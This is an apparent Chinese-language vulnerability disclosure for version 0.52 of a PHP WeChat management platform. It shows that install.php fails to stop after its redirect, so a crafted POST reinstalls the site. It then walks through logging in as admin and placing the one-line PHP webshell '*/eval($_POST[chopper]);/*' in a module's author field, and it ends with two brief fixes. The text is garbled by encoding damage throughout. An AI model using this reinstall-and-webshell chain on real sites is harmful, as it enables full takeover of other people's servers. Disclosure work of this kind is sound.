http://www./源碼下載,，量還是挺大的,。驗證為v0.52,，漏洞應(yīng)該是版本通殺,。

http://bbs./forum.php?mod=viewthread&tid=1155

在/install.php文件中26~28行代碼如下：

if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') {

header('location: ./index.php');

}

如果滿足條件,，則跳轉(zhuǎn)到index.php，但header并沒有阻止程序繼續(xù)往下執(zhí)行,。通過構(gòu)造post包,，可以實現(xiàn)整站重裝。

http://127.0.0.1/weixin/member.php?act=login&

admin/111111進行登錄,，在全局設(shè)置---模塊管理---模塊設(shè)計中添加一個新的模塊

在作者框內(nèi)填寫一句話木馬*/eval($_POST[chopper]);/*,，生成模塊模板

webshell地址：

http://127.0.0.1/weixin/source/modules/test/module.php

如上

1.安裝完后自動刪除install.php文件，或滿足條件處跳轉(zhuǎn)后退出,；

2.sql注入處正確過濾,。